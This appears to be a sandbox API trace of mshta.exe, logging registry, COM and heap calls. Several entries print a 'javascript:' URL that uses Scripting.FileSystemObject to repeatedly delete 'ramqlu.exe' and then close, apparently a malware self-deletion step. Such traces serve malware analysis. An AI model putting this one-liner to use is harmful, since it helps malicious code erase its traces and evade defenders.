HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4537f8 | out: hHeap=0x410000) returned 1 [0069.851] IUnknown:Release (This=0x444bf4) returned 0x3 [0069.851] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4537c8 | out: hHeap=0x410000) returned 1 [0069.851] GetWindowLongW (hWnd=0x202a8, nIndex=-21) returned 4468680 [0069.852] GetMessageTime () returned 0 [0069.852] GetMessagePos () returned 0x0 [0069.852] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x445c90, hWnd=0x202a8, msg=0x281, wParam=0x0, lParam=0xc000000f, plResult=0x2cf524 | out: plResult=0x2cf524) returned 0x0 [0069.852] GetCurrentThreadId () returned 0x90 [0069.852] GetWindowLongW (hWnd=0x202a8, nIndex=-21) returned 4468680 [0069.852] GetMessageTime () returned 0 [0069.852] GetMessagePos () returned 0x0 [0069.852] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x445c90, hWnd=0x202a8, msg=0x281, wParam=0x1, lParam=0xc000000f, plResult=0x2cf524 | out: plResult=0x2cf524) returned 0x0 [0069.853] GetCurrentThreadId () returned 0x90 [0069.853] IsOS (dwOS=0x25) returned 1 [0069.853] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf730 | out: phkResult=0x2cf730*=0x1e8) returned 0x0 [0069.853] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf734 | out: phkResult=0x2cf734*=0x1ec) returned 0x0 [0069.853] RegOpenKeyExW (in: hKey=0x1ec, lpSubKey="FEATURE_MSHTML_AUTOLOAD_IEFRAME", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf6f0 | out: phkResult=0x2cf6f0*=0x0) returned 0x2 [0069.853] RegOpenKeyExW (in: hKey=0x1e8, lpSubKey="FEATURE_MSHTML_AUTOLOAD_IEFRAME", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf6f0 | out: phkResult=0x2cf6f0*=0x1f0) returned 0x0 [0069.853] SHRegGetValueW () returned 0x0 [0069.854] RegCloseKey (hKey=0x1f0) returned 0x0 [0069.854] RegCloseKey (hKey=0x0) returned 0x6 [0069.854] RegCloseKey (hKey=0x0) returned 0x6 [0069.854] RegCloseKey (hKey=0x1e8) returned 0x0 [0069.854] RegCloseKey (hKey=0x1ec) returned 0x0 [0069.854] LoadLibraryW (lpLibFileName="ieframe.dll") returned 0x73710000 [0071.890] GetVersionExW (in: lpVersionInformation=0x2cf23c*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x2cf23c*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0071.890] LoadLibraryExW (lpLibFileName="ieframe.dll", hFile=0x0, dwFlags=0x22) returned 0x73710000 [0071.890] LoadStringW (in: hInstance=0x73710000, uID=0xb5, lpBuffer=0x2cf7b8, cchBufferMax=46 | out: lpBuffer="HTML Document") returned 0xd [0071.892] LoadStringW (in: hInstance=0x73710000, uID=0xb5, lpBuffer=0x2cf818, cchBufferMax=46 | out: lpBuffer="HTML Document") returned 0xd [0071.892] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x28) returned 0x4537c8 [0071.893] LoadStringW (in: hInstance=0x73710000, uID=0xb5, lpBuffer=0x2cf804, cchBufferMax=46 | out: lpBuffer="HTML Document") returned 0xd [0071.893] RtlReAllocateHeap (Heap=0x410000, Flags=0x0, Ptr=0x42d8e8, Size=0x48) returned 0x45dbd0 [0071.893] ShowWindow (hWnd=0x202a8, nCmdShow=1) returned 1 [0071.893] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43f818 | out: hHeap=0x410000) returned 1 [0071.893] GetMessageW (in: lpMsg=0x2cfa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2cfa74) returned 1 [0071.893] TranslateMessage (lpMsg=0x2cfa74) returned 0 [0071.893] DispatchMessageW (lpMsg=0x2cfa74) returned 0x0 [0071.894] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc) returned 0x43f818 [0071.894] RegisterDragDrop (hwnd=0x202a8, pDropTarget=0x750296cc) returned 0x0 [0071.894] GetCurrentThreadId () returned 0x90 [0071.894] GetCurrentThreadId () returned 0x90 [0071.894] GetCurrentThreadId () returned 0x90 [0071.894] GetCurrentThreadId () returned 0x90 [0071.894] GetMessageW (in: lpMsg=0x2cfa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2cfa74) returned 1 [0071.894] TranslateMessage (lpMsg=0x2cfa74) returned 0 [0071.894] DispatchMessageW (lpMsg=0x2cfa74) returned 0x0 [0071.895] IInternetProtocolRoot:Continue (This=0x45435c, pProtocolData=0x42d9c8) returned 0x0 [0071.895] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x1a) returned 0x46c678 [0071.895] ParseURLW (in: pcszURL="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);", ppu=0x2cf870 | out: ppu=0x2cf870) returned 0x0 [0071.895] IUnknown:QueryInterface (in: This=0x453428, riid=0x74ccb940*(Data1=0x332c4427, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x2cf764 | out: ppvObject=0x2cf764*=0x0) returned 0x80004002 [0071.895] IServiceProvider:QueryService (in: This=0x45342c, guidService=0x74ccb940*(Data1=0x332c4427, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), riid=0x74ccb940*(Data1=0x332c4427, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x2cf764 | out: ppvObject=0x2cf764*=0x444aa4) returned 0x0 [0071.895] GetCurrentThreadId () returned 0x90 [0071.895] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf818 | out: phkResult=0x2cf818*=0x21c) returned 0x0 [0071.896] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf81c | out: phkResult=0x2cf81c*=0x220) returned 0x0 [0071.896] RegOpenKeyExW (in: hKey=0x220, lpSubKey="FEATURE_SCRIPTURL_MITIGATION", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf7d8 | out: phkResult=0x2cf7d8*=0x0) returned 0x2 [0071.896] RegOpenKeyExW (in: hKey=0x21c, lpSubKey="FEATURE_SCRIPTURL_MITIGATION", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf7d8 | out: phkResult=0x2cf7d8*=0x0) returned 0x2 [0071.896] RegCloseKey (hKey=0x0) returned 0x6 [0071.896] RegCloseKey (hKey=0x0) returned 0x6 [0071.896] RegCloseKey (hKey=0x21c) returned 0x0 [0071.896] RegCloseKey (hKey=0x220) returned 0x0 [0071.896] StrToIntW (lpSrc="4479904") returned 4479904 [0071.897] CoTaskMemFree (pv=0x42d8e8) [0071.897] IUnknown:AddRef (This=0x43bfcc) returned 0x4 [0071.897] IInternetSecurityManager:MapUrlToZone (in: This=0x750296bc, pwszUrl="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);", pdwZone=0x2cf80c, dwFlags=0x0 | out: pdwZone=0x2cf80c*=0xffffffff) returned 0x800c0011 [0071.897] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0071.897] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0071.897] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0071.897] IInternetSecurityManager:ProcessUrlAction (in: This=0x750296bc, pwszUrl="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);", dwAction=0x1400, pPolicy=0x2cf810, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x2cf810*=0x0) returned 0x0 [0071.897] IUnknown:Release (This=0x43bfcc) returned 0x3 [0071.897] CoCreateInstance (in: rclsid=0x2cf7c4*(Data1=0xf414c260, Data2=0x6ac0, Data3=0x11cf, Data4=([0]=0xb6, [1]=0xd1, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbb, [6]=0xbb, [7]=0x58)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x74c495b4*(Data1=0xbb1a2ae1, Data2=0xa4f9, Data3=0x11cf, Data4=([0]=0x8f, [1]=0x20, [2]=0x0, [3]=0x80, [4]=0x5f, [5]=0x2c, [6]=0xd0, [7]=0x64)), ppv=0x2cf780 | out: ppv=0x2cf780*=0x2a50488) returned 0x0 [0072.901] malloc (_Size=0x80) returned 0x58d990 [0072.901] GetVersion () returned 0x1db10106 [0072.901] __dllonexit () returned 0x74a57ecf [0072.901] __dllonexit () returned 0x74a57e9b [0072.901] __dllonexit () returned 0x74a57eb5 [0072.902] __dllonexit () returned 0x74a57f70 [0072.961] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x77710000 [0072.962] GetProcAddress (hModule=0x77710000, lpProcName="RegisterTraceGuidsA") returned 0x77ca848f [0072.962] EtwRegisterTraceGuidsA () returned 0x0 [0072.962] GetProcAddress (hModule=0x77710000, lpProcName="RegisterTraceGuidsA") returned 0x77ca848f [0072.962] EtwRegisterTraceGuidsA () returned 0x0 [0072.962] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x2ce134, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe")) returned 0x1d [0072.963] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExA") returned 0x77724907 [0072.963] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows Script\\Features", ulOptions=0x0, samDesired=0x1, phkResult=0x2ce258 | out: phkResult=0x2ce258*=0x0) returned 0x2 [0072.973] GetVersion () returned 0x1db10106 [0072.973] DllGetClassObject (in: rclsid=0x441310*(Data1=0xf414c260, Data2=0x6ac0, Data3=0x11cf, Data4=([0]=0xb6, [1]=0xd1, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbb, [6]=0xbb, [7]=0x58)), riid=0x7666ee84*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2cea44 | out: ppv=0x2cea44*=0x58fe00) returned 0x0 [0072.973] ??2@YAPAXI@Z () returned 0x58fe00 [0072.974] JScriptEngine5:IClassFactory:CreateInstance (in: This=0x58fe00, pUnkOuter=0x0, riid=0x2cf3f0*(Data1=0xbb1a2ae1, Data2=0xa4f9, Data3=0x11cf, Data4=([0]=0x8f, [1]=0x20, [2]=0x0, [3]=0x80, [4]=0x5f, [5]=0x2c, [6]=0xd0, [7]=0x64)), ppvObject=0x2cea30 | out: ppvObject=0x2cea30*=0x2a50488) returned 0x0 [0072.974] ??2@YAPAXI@Z () returned 0x2a50488 [0072.974] GetUserDefaultLCID () returned 0x409 [0072.974] GetACP () returned 0x4e4 [0072.974] JScriptEngine5:IUnknown:AddRef (This=0x2a50488) returned 0x2 [0072.974] JScriptEngine5:IUnknown:Release (This=0x2a50488) returned 0x1 [0072.974] JScriptEngine5:IUnknown:Release (This=0x58fe00) returned 0x0 [0072.974] ??3@YAXPAX@Z () returned 0x1 [0072.974] JScriptEngine5:IUnknown:QueryInterface (in: This=0x2a50488, riid=0x74c495b4*(Data1=0xbb1a2ae1, Data2=0xa4f9, Data3=0x11cf, Data4=([0]=0x8f, [1]=0x20, [2]=0x0, [3]=0x80, [4]=0x5f, [5]=0x2c, [6]=0xd0, [7]=0x64)), ppvObject=0x2cf724 | out: ppvObject=0x2cf724*=0x2a50488) returned 0x0 [0072.974] JScriptEngine5:IUnknown:Release (This=0x2a50488) returned 0x1 [0072.975] IUnknown:AddRef (This=0x43bfcc) returned 0x4 [0072.975] IInternetSecurityManager:MapUrlToZone (in: This=0x750296bc, pwszUrl="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);", pdwZone=0x2cf694, dwFlags=0x0 | out: pdwZone=0x2cf694*=0xffffffff) returned 0x800c0011 [0072.975] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0072.975] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0072.975] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0072.975] IInternetSecurityManager:ProcessUrlAction (in: This=0x750296bc, pwszUrl="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);", dwAction=0x1401, pPolicy=0x2cf698, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x2cf698*=0x0) returned 0x0 [0072.975] IUnknown:Release (This=0x43bfcc) returned 0x3 [0072.975] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x54) returned 0x470de8 [0072.986] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x4707c0 [0072.986] GetCurrentThreadId () returned 0x90 [0072.986] ??2@YAPAXI@Z () returned 0x58fe00 [0072.986] GetCurrentThreadId () returned 0x90 [0072.986] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\COM3", ulOptions=0x0, samDesired=0x20019, phkResult=0x2cf5c0 | out: phkResult=0x2cf5c0*=0x224) returned 0x0 [0072.986] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExA") returned 0x777248ef [0072.986] RegQueryValueExA (in: hKey=0x224, lpValueName="COM+Enabled", lpReserved=0x0, lpType=0x2cf5b4, lpData=0x2cf5b8, lpcbData=0x2cf5bc*=0x4 | out: lpType=0x2cf5b4*=0x4, lpData=0x2cf5b8*=0x1, lpcbData=0x2cf5bc*=0x4) returned 0x0 [0072.986] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0072.986] RegCloseKey (hKey=0x224) returned 0x0 [0072.987] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x76620000 [0072.987] GetProcAddress (hModule=0x76620000, lpProcName="CoGetObjectContext") returned 0x7666632b [0072.987] LoadLibraryExA (lpLibFileName="ole32.dll", hFile=0x0, dwFlags=0x0) returned 0x76620000 [0072.987] GetProcAddress (hModule=0x76620000, lpProcName="CoCreateInstance") returned 0x76669d0b [0072.987] CoCreateInstance (in: rclsid=0x74a423a8*(Data1=0x323, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x74a423b8*(Data1=0x146, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2cf5bc | out: ppv=0x2cf5bc*=0x76766460) returned 0x0 [0072.987] ??2@YAPAXI@Z () returned 0x58fe38 [0072.987] ??_U@YAPAXI@Z () returned 0x5813c0 [0072.987] ??2@YAPAXI@Z () returned 0x58fec8 [0072.987] ??2@YAPAXI@Z () returned 0x2a506a0 [0072.988] ??2@YAPAXI@Z () returned 0x58ff00 [0072.988] GetCurrentThreadId () returned 0x90 [0072.988] GetEnvironmentVariableW (in: lpName="JS_PROFILER", lpBuffer=0x2cf560, nSize=0x27 | out: lpBuffer="") returned 0x0 [0072.988] GetCurrentThreadId () returned 0x90 [0072.988] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0072.989] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x2cf5d0, cchData=6 | out: lpLCData="1252") returned 5 [0072.989] IsValidCodePage (CodePage=0x4e4) returned 1 [0072.989] GetCurrentThreadId () returned 0x90 [0072.989] GetCurrentThreadId () returned 0x90 [0072.989] CoCreateInstance (in: rclsid=0x74a415ec*(Data1=0x6c736db1, Data2=0xbd94, Data3=0x11d0, Data4=([0]=0x8a, [1]=0x23, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xb5, [6]=0x8e, [7]=0x10)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x74a415fc*(Data1=0x6c736dc1, Data2=0xab0d, Data3=0x11d0, Data4=([0]=0xa2, [1]=0xad, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x27, [7]=0xe8)), ppv=0x2a50674 | out: ppv=0x2a50674*=0x45f140) returned 0x0 [0072.989] IUnknown:AddRef (This=0x45f140) returned 0x2 [0072.989] GetCurrentProcessId () returned 0x358 [0072.989] GetCurrentThreadId () returned 0x90 [0072.989] GetTickCount () returned 0x1148ce5 [0072.989] ISystemDebugEventFire:BeginSession (This=0x45f140, guidSourceID=0x74a416d4, strSessionName="JScript:00000856:00000144:18124005") returned 0x0 [0072.990] GetCurrentThreadId () returned 0x90 [0072.990] GetCurrentThreadId () returned 0x90 [0072.990] ??2@YAPAXI@Z () returned 0x58ff68 [0073.008] GetCurrentThreadId () returned 0x90 [0073.008] StrCmpICW (pszStr1="window", pszStr2="window") returned 0 [0073.008] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x14) returned 0x46fb68 [0073.009] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2cf52c | out: ppv=0x2cf52c*=0x436988) returned 0x0 [0073.011] ??2@YAPAXI@Z () returned 0x58ffa0 [0073.011] StdGlobalInterfaceTable:IGlobalInterfaceTable:RegisterInterfaceInGlobal (in: This=0x76766460, pUnk=0x58ffa0, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pdwCookie=0x58ffbc | out: pdwCookie=0x58ffbc*=0x100) returned 0x0 [0073.520] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x58ffa0, riid=0x766597c4*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2cf4b0 | out: ppvObject=0x2cf4b0*=0x0) returned 0x80004002 [0073.520] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x58ffa0, riid=0x76663e0c*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2cf4a0 | out: ppvObject=0x2cf4a0*=0x0) returned 0x80004002 [0073.520] StdGlobalInterfaceTable:IUnknown:AddRef (This=0x58ffa0) returned 0x2 [0073.520] IUnknown:AddRef (This=0x436988) returned 0x2 [0073.520] IUnknown:Release (This=0x436988) returned 0x1 [0073.520] ??2@YAPAXI@Z () returned 0x2a50998 [0073.521] GetTickCount () returned 0x1148d13 [0073.521] ??2@YAPAXI@Z () returned 0x2a50fe8 [0073.521] malloc (_Size=0x40) returned 0x2a51058 [0073.521] malloc (_Size=0x104) returned 0x2a510a0 [0073.521] ??2@YAPAXI@Z () returned 0x58ffc8 [0073.521] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2cf548 | out: ppv=0x2cf548*=0x436988) returned 0x0 [0073.521] IUnknown:Release (This=0x436988) returned 0x1 [0073.521] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2cf548 | out: ppv=0x2cf548*=0x436988) returned 0x0 [0073.521] IUnknown:Release (This=0x436988) returned 0x1 [0073.522] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x4707d8 [0073.522] GetCurrentThreadId () returned 0x90 [0073.522] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x10) returned 0x4707f0 [0073.522] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x472050 [0073.522] GetCurrentThreadId () returned 0x90 [0073.522] realloc (_Block=0x0, _Size=0xc8) returned 0x2a511b0 [0073.523] ??2@YAPAXI@Z () returned 0x2a51280 [0073.523] malloc (_Size=0x804) returned 0x2a512a8 [0073.523] ??2@YAPAXI@Z () returned 0x2a51ab8 [0073.523] malloc (_Size=0x104) returned 0x2a51c20 [0073.524] malloc (_Size=0x204) returned 0x2a51d30 [0073.524] malloc (_Size=0x404) returned 0x2a51f40 [0073.525] ??3@YAXPAX@Z () returned 0x1 [0073.525] malloc (_Size=0x40) returned 0x2a51ab8 [0073.525] realloc (_Block=0x2a51ab8, _Size=0x60) returned 0x2a51ab8 [0073.525] malloc (_Size=0x3d0) returned 0x2a52350 [0073.526] ??2@YAPAXI@Z () returned 0x5813d0 [0073.526] free (_Block=0x2a512a8) [0073.526] ??3@YAXPAX@Z () returned 0x1 [0073.526] free (_Block=0x2a51ab8) [0073.526] free (_Block=0x2a51f40) [0073.526] free (_Block=0x2a51d30) [0073.526] free (_Block=0x2a51c20) [0073.526] ??2@YAPAXI@Z () returned 0x2a52728 [0073.526] ??2@YAPAXI@Z () returned 0x2a52760 [0073.526] malloc (_Size=0xc) returned 0x2a52780 [0073.527] ??2@YAPAXI@Z () returned 0x2a52798 [0073.527] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2cf668 | out: ppv=0x2cf668*=0x436988) returned 0x0 [0073.527] IUnknown:Release (This=0x436988) returned 0x1 [0073.527] ??2@YAPAXI@Z () returned 0x2a527e0 [0073.528] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2cf6b8 | out: ppv=0x2cf6b8*=0x436988) returned 0x0 [0073.529] IUnknown:Release (This=0x436988) returned 0x1 [0073.529] ??2@YAPAXI@Z () returned 0x2a52850 [0073.529] ISystemDebugEventFire:IsActive (This=0x45f140) returned 0x1 [0073.529] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2cf6b4 | out: ppv=0x2cf6b4*=0x436988) returned 0x0 [0073.530] IUnknown:Release (This=0x436988) returned 0x1 [0073.530] malloc (_Size=0x658) returned 0x2a528d0 [0073.530] GetCurrentThreadId () returned 0x90 [0073.530] GetCurrentThreadId () returned 0x90 [0073.531] GetCurrentThreadId () returned 0x90 [0073.532] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x24) returned 0x453858 [0073.532] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0073.532] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0073.564] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x42d8e8 [0073.601] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30c) returned 0x473240 [0073.601] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x18) returned 0x46fb88 [0073.601] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x18) returned 0x46fba8 [0073.601] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x18) returned 0x46fbc8 [0073.601] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x18) returned 0x46fbe8 [0073.601] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x18) returned 0x46fc08 [0073.601] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x18) returned 0x46fc28 [0073.601] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x18) returned 0x46fc48 [0073.601] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x18) returned 0x46fc68 [0073.601] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x18) returned 0x46fc88 [0073.601] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x18) returned 0x46fca8 [0073.601] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x18) returned 0x46fcc8 [0073.601] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x18) returned 0x46fce8 [0073.601] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x10) returned 0x470808 [0073.628] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0073.628] IsCharSpaceW (wch=0x6f) returned 0 [0073.628] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0073.628] IsCharSpaceW (wch=0x6f) returned 0 [0073.628] ??2@YAPAXI@Z () returned 0x2a52f30 [0073.629] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x76620000 [0073.629] GetProcAddress (hModule=0x76620000, lpProcName="CLSIDFromProgIDEx") returned 0x76630782 [0073.629] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x2cf27c | out: lpclsid=0x2cf27c*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0 [0073.632] SysStringLen (param_1=0x0) returned 0x0 [0073.632] GetProcAddress (hModule=0x76620000, lpProcName="CoGetClassObject") returned 0x766554ad [0073.632] CoGetClassObject (in: rclsid=0x2cf27c*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x74a4087c*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2cf270 | out: ppv=0x2cf270*=0x2a52fa0) returned 0x0 [0074.262] FileSystemObject:IUnknown:QueryInterface (in: This=0x2a52fa0, riid=0x74a47884*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x2cf26c | out: ppvObject=0x2cf26c*=0x0) returned 0x80004002 [0074.262] FileSystemObject:IClassFactory:CreateInstance (in: This=0x2a52fa0, pUnkOuter=0x0, riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2cf274 | out: ppvObject=0x2cf274*=0x2a52fc0) returned 0x0 [0074.262] FileSystemObject:IUnknown:Release (This=0x2a52fa0) returned 0x0 [0074.262] FileSystemObject:IUnknown:QueryInterface (in: This=0x2a52fc0, riid=0x74a45a50*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x2cf228 | out: ppvObject=0x2cf228*=0x0) returned 0x80004002 [0074.262] 